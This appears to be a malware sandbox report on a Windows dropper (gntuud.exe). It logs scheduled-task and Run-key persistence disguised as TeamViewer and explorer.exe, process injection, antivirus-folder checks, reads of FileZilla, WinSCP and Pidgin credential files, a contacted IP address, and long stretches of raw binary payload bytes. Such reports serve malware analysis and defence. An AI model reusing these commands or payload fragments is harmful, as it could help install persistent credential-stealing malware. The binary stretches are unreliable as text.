±8Ä8É8Î{rpo! {yas" o# {o$ {o% s& -B&&,('   Âs" (( r/po) +}8Eÿÿÿ(* 8Gÿÿÿ}+¹*8 ÿÿÿs+ 8ÿÿÿ8"ÿÿÿ8(ÿÿÿo, 8)ÿÿÿ8(ÿÿÿs- 82ÿÿÿo. 8-ÿÿÿ8,ÿÿÿ0æ8›8œ, &8- +8š+ð*8˜{8”8™-6&8š8›-+&þ.o/ o0 t0o1 ~-+ +È +Óþ s2 €~(+o4 o5 &( *8_ÿÿÿ( 8Zÿÿÿ8]ÿÿÿ 8`ÿÿÿ8bÿÿÿo6 8bÿÿÿs7 8]ÿÿÿ8`ÿÿÿ(8 8[ÿÿÿN++*(+ö(9 +ñ0þ8¯{8«8¯- &8°9+8ª+íÐ48¤8©8ªt8ª~-þ s: -&+€+~(+t5(; t4-*&{o6 o< o= ¥7o> + +Ô*8Kÿÿÿo6 8Kÿÿÿo< 8Gÿÿÿ8Jÿÿÿ 8Pÿÿÿ(? 8Rÿÿÿ8Qÿÿÿo@ 8LÿÿÿoA 8Lÿÿÿª+- &+r=p++&+ò-ø*+æoB +æ(C +æª+- &+rip++&+ò-ø*+æoD +æ(C +æ0 -&( +&+ö*n+ -&++ +*s+î(E +ï(F *1èismtyoiuy«”xiÈmtykiuykxipmtykiuyTkxipmtykiuyTkxipmtykiuyÔkxi~rÎwkÝ|´uÓy%½L U &T  K PKY$+IEdxspkxipmty;,uyj{iâkiuyTkximzX`hsyTe[ipktykiuy G[ipMtyk)VyTk8ipMtykkuyPkxipmtyoiuyTkxipíWykkuyTkxism4ükieyT{xipmdykyuyTkxi`mtykiuyTkxi`AWy iuyT+[i\ntykiuyTkxipmtykiuyT [i|mtykiuyTkxipmtykiuyTkxipmtykiuyTkxipmtykiuyTkxipmtykIuy\kxipmtykiuy\Kxi8mtykiuyTkxi^iuy0g[ipMtykgVyTixipmtykiuyTkxiPmtE 7kxi\ntyk)VyToxip}WykiuyTkxipmty+iu¹ztygiuyT [ipotyk}VyTkxipmtykiuykx+pmtykiuyTkxipmty+EVyTkxi8mtyiipy8:hi`zyjiuyTkxi”3jyr qyÄ@[iðmtykiuyTkxipmtykiuyTkxipmtykiuyTkxivGty)A lTmPjpmrQoiu~kxinm\~isSJkPhpmrSEA lTmPopmrSyiuy~kxibmtyAiuyTkxipmtykiuyTm@ipmt{C}uy^Kxipm >ciqWcxmJytykOUyTkxQymtyS®Š†«•tip(uykipyTk@ipmtSyiuy~kxipmtykiuyTkxitU˜†”–uyzC|pk\ukisSFkx~ZmtyjCuyFkx}Zmtyyiuy~kxibmtyAiuyTkxipmtykiuyTm@ipmt{C}uy^Kyipm >ciqAcxmJytykOUxTkxQymtyS®Š†«•tip(wykisyTkGipmqykiMxTkxCr9qkm]ôBk~>et}CøcyR~ipiTxkiucxm ^|yoSΆ«”^IrmtySي†«i{tmt}KiuyT?api;ciqCÁ”‡–VMtykiM󫔇ibmtyAiuyTkxipmtykiuyTSxipmŠuki0|Tkx pmtjkiuTkxlpmt%kiuAkxialk„P uyTSOipmt¤[iuyV7api\ì}isATkxi¬Mtyki >\k|het}QÀŠ†«MXipmtAõ–Š†~zy~0š‹†”IwyTk@⏒‹{muyPxyIsmtySŠ†«kXipmt,au}/qpitT†”–SYUkxiH4‹†”iuyU{xirmKyn-uhTkxibmtnAiuyTkxipmtykiuyTimpmpjlI`yTk.xmpCau}ndxipKTikiuAPkxiŽauy.IuyT@{ip‹uyk9wyT$xipëwykJwyTÛ{ipÏtyk¥wyTéyip?wykTuyTƒxiphtyk]wyTw{ipÞtyk7uyTÊzip•vyk6wyTåyiptykwyTvyipÙuyk¿wyTxipouyk«uyT{ipåvykQSzTkzk ftyoxwjRx}vŽnykoPhQmipiQhmfyTo|pm~giu}t`xipUJ†”–wf©|ipiTikiuAx”‡–HÃtykIkyTk@t’‹oxiUqTkxQ`’‹†ivˆPkxmH¡tykk 6\k|Aå{tKzuyT?api3ciqC°•‡–VMyykiM ª”‡kf~ykmUdTkxQ¸“‹†SówyTKdipmLÀ•–Š{CsipiTnkiucxm ,|yoS뇫”^I`mtySú‹†«i`pmpiiu}nxipMeykiMª”‡krxykmoTkr}mt}K{uyTS&—’vhhyToX`pmt,au}/bpitW6‡”–SY^kxiHZŠ†”kpTk|rmt}xmUfTkxQP“‹†i~yTokjP`tyk2qTocxmp@o—Š†rKaipmL€––Š{C|ipiL kiuhSRöipmTykiucxm q|yoS§„«”^IpmtyS®ˆ†«iijr~ykm-{/bxitvykm-Yg…<sryykm-)`xitMlykiM쩔‡k dtyok~Tk|rmt}
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ¡ œX«°@@ðOà& äCODE,›œ `DATA´° @ÀBSSá дÀ.idata&à´@À.edataOðÄ@P.relocäÆ@P.rsrc ä@P@ø@P@ StringX@X@¤<@°<@´<@¸<@¬<@$:@@:@|:@TObjectd@TObjectX@System„@ IInterfaceÀFSystemÿÿ̃D$øé©KƒD$øéÇKƒD$øéÑKÌ̱@»@Å@ÀFÑ@@L@Ý@L@ @¤<@8\@D\@¸<@¬<@T\@@:@|:@TInterfacedObject‹Àÿ%¨áA‹Àÿ%¤áA‹Àÿ% áA‹Àÿ%œáA‹Àÿ%˜áA‹Àÿ%”áA‹Àÿ%áA‹Àÿ%ŒáA‹Àÿ%ˆáA‹Àÿ%„áA‹Àÿ%€áA‹Àÿ%|áA‹Àÿ%¼áA‹Àÿ%xáA‹Àÿ%¸áA‹Àÿ%táA‹Àÿ%páA‹Àÿ%láA‹Àÿ%háA‹Àÿ%dáA‹Àÿ%`áA‹Àÿ%\áA‹Àÿ%XáA‹Àÿ%TáA‹Àÿ%PáA‹Àÿ%LáA‹Àÿ%HáA‹Àÿ%´áA‹Àÿ%DáA‹Àÿ%@áA‹Àÿ%<áA‹Àÿ%ÌáA‹Àÿ%ÈáA‹Àÿ%ÄáA‹Àÿ%8áA‹Àÿ%4áA‹Àÿ%ÜáA‹Àÿ%ØáA‹Àÿ%ÔáA‹Àÿ%0áA‹Àÿ%,áA‹Àÿ%(áA‹Àÿ%$áA‹ÀSƒÄ¼» TèYÿÿÿöD$,t·\$0‹ÃƒÄD[ËÀÿ% áA‹Àÿ%áA‹Àÿ%áA‹Àÿ%áA‹Àÿ%áA‹Àÿ% áA‹Àÿ%áA‹Àÿ%áA‹ÀSƒÄô»àÕAƒ;uYhDjè¦ÿÿÿ‰D$ƒ|$u3À‰$ëP‹D$‹ÜÕA‰‹D$£ÜÕA3À‹ÐҋL$TщT$‹T$‹ ‰ ‹T$‰@ƒødu܋‰D$‹D$‹‰‹D$‰$‹$ƒÄ [ɉ@ËÀSVƒÄø‹ò‹Øèfÿÿÿ‰D$ƒ|$u3Àë:‹‹T$‰B‹F‹T$‰B ‹‰$‹D$‹$‰‹D$‰X‹$‹T$‰P‹D$‰°YZ^[ÃÄø‹P‰$‹‰T$‹$‹L$‰ ‹T$‹ $‰J‹àÕA‰£àÕAYZËÀSVWUƒÄø‹Ù‹ð‹ü‹‰‹‰‹B‰C‹‹‰D$‹‹R‹Ê‹/M ‹;Èu‹èÿÿÿ‹‹@‰‹‹@ CëC;Ðu‹èqÿÿÿ‹‹@ C‹D$‰;7u®‹Ó‹Æèúþÿÿ„Àu3À‰YZ]_^[Í@SVWUƒÄð‰$‹ô‹‰D$ ‹ ‹‹@;È‚†‹Ø‹>_ ‹ùz;ßrv;Èu!‹B‹A‹B‹)B ‹ƒx uV‹èðþÿÿëM‹Ø‹>_ ‹ùz;ßu ‹B‹)B ë3‹Z‰\$‹>‹‹.} +û‰|$+ȋ‰H T$‹èMþÿÿ„Àu3Àë°ë‹‹‰‹;D$ …Yÿÿÿ3ÀƒÄ]_^[ÐSVW‹Ú‹ðþ}¾ë Æÿÿæÿÿ‰sjh Vjè4ýÿÿ‹ø‰;…ÿt#‹Ó¸äÕAèÜýÿÿ„Àuh€j‹Pèýÿÿ3À‰_^[ÐSVWU‹Ù‹ò‹èÇCjh hUèáüÿÿ‹ø‰;…ÿuÆÿÿæÿÿ‰sjh VUè¼üÿÿ‰ƒ;t#‹Ó¸äÕAèeýÿÿ„Àuh€j‹Pèžüÿÿ3À‰]_^[ÐSVWUƒÄè‹ù‹ôÇD$ÿÿÿÿ3ɉL$ ‰D$T$‰T$¡äÕA‰ëk‹‹‰D$‹‹X;\$rR‹Ã‹B ;D$wE;\$s‰\$‹‹h‹h ;l$ v‰l$ h€j‹‹@Pèüÿÿ…Àu ÇÀÕA‹èýÿÿ‹D$‰¸äÕA;uŒ3À‰ƒ|$ t‹D$‰‹D$ +D$‰GƒÄ]_^[ËÀSVWUƒÄè‹Ù‰$t$|$l$ ‹Ð‹Êáðÿÿ‰L$$Âÿâðÿÿ‰T$‹D$‰‹D$+D$‰C¡äÕA‰ë[‹‹@‰‹‹@ ‰E‹;D$s‹D$‰‹E;D$v‹D$‰E‹;Esjh‹E+P‹Pè&ûÿÿ…Àu3À‰ë‹‹‰¸äÕA;uœƒÄ]_^[ÐSVWUƒÄè‰$t$|$\$ ‹Ð‹êÅÿåðÿÿ‰l$$âðÿÿ‰T$‹D$‰‹D$+D$‰A¡äÕA‰ëX‹‹@‰‹‹@ ‰‹;D$s‹D$‰‹;D$v‹D$‰‹;s h@‹+P‹Pèwúÿÿ…Àu ÇÀÕA‹‹‰¸äÕA;uŸƒÄ]_^[ËÀSVWUƒÄô‹Ú‹ð‹ü½ôÕAÆÿ?æÀÿÿ‹E‰ëA‹;p 4‹Ë‹‹@‹ÖèJþÿÿƒ;t_‹C‹B‹C‹)B ‹ƒx uG‹èûÿÿë>‹‹‰;/u»‹Ó‹Æèmüÿÿƒ;t&L$‹Ó‹Åèûÿÿƒ|$u’L$‹S‹è"ýÿÿ3À‰ƒÄ ]_^[ËÀSVWUƒÄè‰ $‹ú‹Øt$½ôÕAÇÿ?çÀÿÿ‹E‰ë‹‹‰;.t‹;Xuï‹;Xu_‹;x Žœ‹‹×+P ‹‹@‹A L$è5üÿÿƒ|$t3L$T$‹Åèoúÿÿƒ|$uŸL$‹T$ ‹D$èüÿÿ‹$3҉隍L$‹×‹Ãèîûÿÿƒ|$t4L$T$‹Åè(úÿÿƒ|$…TÿÿÿL$‹T$ ‹D$è4üÿÿ‹$3҉ëR‹‹h;ÝuB‹;x ;‹ $‹Å‹×è×üÿÿ‹$ƒ8t.‹$‹@‹B‹$‹@‹)B ‹ƒx u‹è†ùÿÿë‹$3҉ƒÄ]_^[ÐSƒÄè‹Ùˆÿ?áÀÿÿ‰ $ЁâÀÿÿ‰T$‹D$;$v_‹Ë‹T$+$‹$èýÿÿL$‹Ó¸ôÕAè]ùÿÿ‹\$…ÛtL$‹T$ ‹Ãènûÿÿ‹D$‰D$‹D$‰D$ ƒ|$tT$¸ôÕAè©ùÿÿë3À‰ƒÄ[ËÀU‹ìQ3ÒUhì@dÿ2d‰"hÄÕAè¼÷ÿÿ€=EÐAt hÄÕAè±÷ÿÿ¸äÕAèCøÿÿ¸ôÕAè9øÿÿ¸ ÖAè/øÿÿhøjè_÷ÿÿ£ÖAƒ=ÖAt@¸‹ÖA3ɉL‚ô@=uìÇEüÖA‹Eü‹Uü‰P‹Eü‹Uü‰‹Eü£ÖAƼÕA3ÀZYYd‰hó@€=EÐAt hÄÕAè!÷ÿÿÃéƒ#ëå ¼ÕAY]ÐU‹ìƒ
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x0003ca00', u'virtual_address': u'0x00044000', u'entropy': 7.992757119699273, u'name': u'.data', u'virtual_size': u'0x0003c810'} entropy 7.9927571197 description A section with a high entropy has been found
entropy 0.840554592721 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications over RAW Socket rule Network_TCP_Socket
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline C:\Windows\System32\cmd.exe /c del C:\Users\test22\AppData\Roaming\100002~1\explorer.exe > nul
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
cmdline "C:\Windows\system32\cmd.exe" /c del C:\Users\test22\AppData\Roaming\100002~1\explorer.exe > nul
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
host 45.89.255.250
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2768
region_size: 278528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000170
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TeamViewerSetupx64.exe reg_value C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe reg_value C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TeamViewer_Desktop.exe reg_value C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\LanguageTool.exe reg_value C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
service_name Ghijkl Nopqrstu Wxy service_path C:\Windows\rerzsi.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\LanguageTool reg_value "C:\Users\test22\AppData\Roaming\Microsoft\Vault\LanguageTool.exe"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x0000000000000074
regkey_r:
reg_type: 3 (REG_BINARY)
value: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†°´5êð. 0Ä @  `…@@ „ H.text@à Ä `.rsrc„Æ@@HèÈB°Âú0Õ+(—e+A~ ( <jX( ( ( jXjX( ( &( jXjX ( ( j @ `jX 8pjX ( ( ( jXjX( ( ( jXjX( ( &( jXjX( ( ( jXjX( ( ( jX jX( ( ( jX$jX( (   8•( ( jX ZjX( ( jX( ( o 9U(  jX ZjX( ( X ( jX YZjX( (  (  jX( 8 X  ?bÿÿÿÝ&Ý*A ÀÍ 0A+(È*G/( ( o (+~%:&~þ s %€(+(+o  ( @O(%,o Ži 8š( œXŽi?ßÿÿÿ8J(%,o   Ži  8   š( œ X   Ži?ßÿÿÿ(( Ži( @( & Ži( ( &*0a+(„ vg(  ( @K(%,o Ži 8 š( œX Ži?áÿÿÿ8J(%,o Ži 8š( œXŽi?ßÿÿÿ( o (+~%:&~þ s %€(+(+o Ý &~ Ý~ ( 9G((Ži(  @ ( &Ži(    ( &*·Fý J+(x('I((*0t+(—36j PŽiYjnjXZ 8APPŽij]iPPŽij]i‘Žij]i‘aPjXPŽij]i‘Y X ]ҜjX >¸ÿÿÿPŽiY(+P*07+(ÅÖXL( (+( ( o (! ((" *^+(³rTV(Ÿs€*N+(gK[(Ÿ(# *z+(tÀ8(o$ (% ( *¶+(I[I`(& ((' o( o$ (% o *0Û+(ó+d~ ( <jX( ( ( jXjX( ( &( jXjX ( ( j @ `jX 8pjX ( ( ( jXjX( ( ( jXjX( ( &( jXjX( ( ( jXjX( ( ( jX jX( ( ( jX$jX( (   8•( ( jX ZjX( ( jX( ( o 9U(  jX ZjX( ( X ( jX YZjX( (  (  jX( 8 X  ?bÿÿÿÝ &(s) z*A ÀÍ 0»+(†(ZCT %Œ¢%MŒ¢%MŒ¢%Œ¢%KŒ¢ ( o (+~%:&~þs %€(+(+o (( Ð(* (+ o, ¥9*š¥T*N+(Xí~^(Ÿ(# *^+(€mRR(Ÿs€*N+(h¿Rj(Ÿ(# *z+(Ý=Jc(o$ (% ( *0#+(ÆÆfZ( ~o- ~¢*~+(ûkL~š%: &(*‚+(CíX~š%: & (*‚+(L¦2n~š%: & (*‚+(ó>V~š%: &&(*‚+(£J#?~š%: &=(*‚+(¦@"0~š%: &N(*‚+(ڃ2P~š%: &\(*‚+(5F[m~š%: &{(*Ž+(:L~š%:& ‘ (*–+(A==Z~ š%:& š (*0d+(&*m(Ÿ € ¦%Ð(. € 8~~‘a ªaҜX ~Žiþ:Öÿÿÿ*0j +(À‘Lb~  Xo/ o0  89š ~  o1 Xo2 t. (3 t o4 X Ži?¾ÿÿÿ*N+(ÓZ^Z(Ÿ(# *š+(ú5-4(ŸÐ (* o5 o6 € *0w€#Ð (* o5 € @%Ð:(. €/€.€!€2€ s# €"€ s# € €€€€~ €~ €$€*€€€%s7 €€+j€0€€(j€€1€)€,€~ €€s8 €'€€€€€€&~ € (9 %Ð;(. o( €-(: Ý&Ý*e p *0 W 
regkey: HKEY_CURRENT_USER\Software\TeamViewerSetupx64\(Default)
1 0 0
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $SG*Þ&D&D&D\^GŒ&D\^AŒ‚&D\^@Œ&DES@Œ&DESGŒ&DESAŒ &D\^EŒ&D&E„&DÕSAŒ&DÕS»&DÕSFŒ&DRich&DPEL#q–cà öS% @@@ܪ<ðà¸2¼‚Àƒ؂@ x.text@ `.rdataR“ ”@@.dataÌ*À œ@À.rsrcàð¨@@.reloc¸24ª@B
base_address: 0x00400000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer: Ä#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#C(Cÿÿÿÿÿÿÿÿ€±¿DNæ@»u˜ÿÿÿÿ “   ÿÿÿÿHLCˆÂCˆÂCˆÂCˆÂCˆÂCÀÇCÈNCHPC ECÈÁC˜ÂCC  abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þÈC˜êC˜êC˜êC˜êC˜êC˜êC˜êC˜êC˜êCÈCœêCœêCœêCœêCœêCœêCœêC..þÿÿÿþÿÿÿŒ7C.?AVbad_array_new_length@std@@Œ7C.?AVbad_alloc@std@@Œ7C.?AVexception@std@@Œ7C.?AVruntime_error@std@@Œ7C.?AVlogic_error@std@@Œ7C.?AVlength_error@std@@Œ7C.?AVout_of_range@std@@Œ7C.?AVsystem_error@std@@Œ7C.?AV_System_error@std@@Œ7C.?AVbad_exception@std@@Œ7C.?AVerror_category@std@@Œ7C.?AV_Generic_error_category@std@@Œ7C.?AVtype_info@@
base_address: 0x0043c000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer: €0€ H`ð}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0043f000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2768
process_handle: 0x00000170
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $SG*Þ&D&D&D\^GŒ&D\^AŒ‚&D\^@Œ&DES@Œ&DESGŒ&DESAŒ &D\^EŒ&D&E„&DÕSAŒ&DÕS»&DÕSFŒ&DRich&DPEL#q–cà öS% @@@ܪ<ðà¸2¼‚Àƒ؂@ x.text@ `.rdataR“ ”@@.dataÌ*À œ@À.rsrcàð¨@@.reloc¸24ª@B
base_address: 0x00400000
process_identifier: 2768
process_handle: 0x00000170
1 1 0
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Process injection Process 2648 called NtSetContextThread to modify thread in remote process 2768
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4334931
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000038c
process_identifier: 2768
1 0 0
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x0000000000000074
regkey_r:
reg_type: 3 (REG_BINARY)
value: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†°´5êð. 0Ä @  `…@@ „ H.text@à Ä `.rsrc„Æ@@HèÈB°Âú0Õ+(—e+A~ ( <jX( ( ( jXjX( ( &( jXjX ( ( j @ `jX 8pjX ( ( ( jXjX( ( ( jXjX( ( &( jXjX( ( ( jXjX( ( ( jX jX( ( ( jX$jX( (   8•( ( jX ZjX( ( jX( ( o 9U(  jX ZjX( ( X ( jX YZjX( (  (  jX( 8 X  ?bÿÿÿÝ&Ý*A ÀÍ 0A+(È*G/( ( o (+~%:&~þ s %€(+(+o  ( @O(%,o Ži 8š( œXŽi?ßÿÿÿ8J(%,o   Ži  8   š( œ X   Ži?ßÿÿÿ(( Ži( @( & Ži( ( &*0a+(„ vg(  ( @K(%,o Ži 8 š( œX Ži?áÿÿÿ8J(%,o Ži 8š( œXŽi?ßÿÿÿ( o (+~%:&~þ s %€(+(+o Ý &~ Ý~ ( 9G((Ži(  @ ( &Ži(    ( &*·Fý J+(x('I((*0t+(—36j PŽiYjnjXZ 8APPŽij]iPPŽij]i‘Žij]i‘aPjXPŽij]i‘Y X ]ҜjX >¸ÿÿÿPŽiY(+P*07+(ÅÖXL( (+( ( o (! ((" *^+(³rTV(Ÿs€*N+(gK[(Ÿ(# *z+(tÀ8(o$ (% ( *¶+(I[I`(& ((' o( o$ (% o *0Û+(ó+d~ ( <jX( ( ( jXjX( ( &( jXjX ( ( j @ `jX 8pjX ( ( ( jXjX( ( ( jXjX( ( &( jXjX( ( ( jXjX( ( ( jX jX( ( ( jX$jX( (   8•( ( jX ZjX( ( jX( ( o 9U(  jX ZjX( ( X ( jX YZjX( (  (  jX( 8 X  ?bÿÿÿÝ &(s) z*A ÀÍ 0»+(†(ZCT %Œ¢%MŒ¢%MŒ¢%Œ¢%KŒ¢ ( o (+~%:&~þs %€(+(+o (( Ð(* (+ o, ¥9*š¥T*N+(Xí~^(Ÿ(# *^+(€mRR(Ÿs€*N+(h¿Rj(Ÿ(# *z+(Ý=Jc(o$ (% ( *0#+(ÆÆfZ( ~o- ~¢*~+(ûkL~š%: &(*‚+(CíX~š%: & (*‚+(L¦2n~š%: & (*‚+(ó>V~š%: &&(*‚+(£J#?~š%: &=(*‚+(¦@"0~š%: &N(*‚+(ڃ2P~š%: &\(*‚+(5F[m~š%: &{(*Ž+(:L~š%:& ‘ (*–+(A==Z~ š%:& š (*0d+(&*m(Ÿ € ¦%Ð(. € 8~~‘a ªaҜX ~Žiþ:Öÿÿÿ*0j +(À‘Lb~  Xo/ o0  89š ~  o1 Xo2 t. (3 t o4 X Ži?¾ÿÿÿ*N+(ÓZ^Z(Ÿ(# *š+(ú5-4(ŸÐ (* o5 o6 € *0w€#Ð (* o5 € @%Ð:(. €/€.€!€2€ s# €"€ s# € €€€€~ €~ €$€*€€€%s7 €€+j€0€€(j€€1€)€,€~ €€s8 €'€€€€€€&~ € (9 %Ð;(. o( €-(: Ý&Ý*e p *0 W 
regkey: HKEY_CURRENT_USER\Software\TeamViewerSetupx64\(Default)
1 0 0
Process injection Process 2140 resumed a thread in remote process 2248
Process injection Process 2648 resumed a thread in remote process 2768
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000224
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

 thread_handle: 0x0000038c
suspend_count: 1
process_identifier: 2768
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2160
thread_handle: 0x000003bc
process_identifier: 2140
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\1000028000\explorer.exe"
filepath_r: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000438
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\4ca685c424" /P "test22:N"&&CACLS "..\4ca685c424" /P "test22:R" /E&&Exit
cmdline CACLS "..\4ca685c424" /P "test22:N"
cmdline cmd /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\4ca685c424" /P "test22:N"&&CACLS "..\4ca685c424" /P "test22:R" /E&&Exit
cmdline CACLS "gntuud.exe" /P "test22:R" /E
cmdline CACLS "gntuud.exe" /P "test22:N"
cmdline CACLS "..\4ca685c424" /P "test22:R" /E
regkey HKEY_CURRENT_USER\Software\TeamViewerSetupx64
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2292
thread_handle: 0x0000027c
process_identifier: 2288
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000284
1 1 0

NtResumeThread

 thread_handle: 0x00000238
suspend_count: 1
process_identifier: 2288
1 0 0

CreateProcessInternalW

 thread_identifier: 2616
thread_handle: 0x0000025c
process_identifier: 2612
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000264
1 1 0

CreateProcessInternalW

 thread_identifier: 2676
thread_handle: 0x000001e4
process_identifier: 2672
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cmd.exe
track: 1
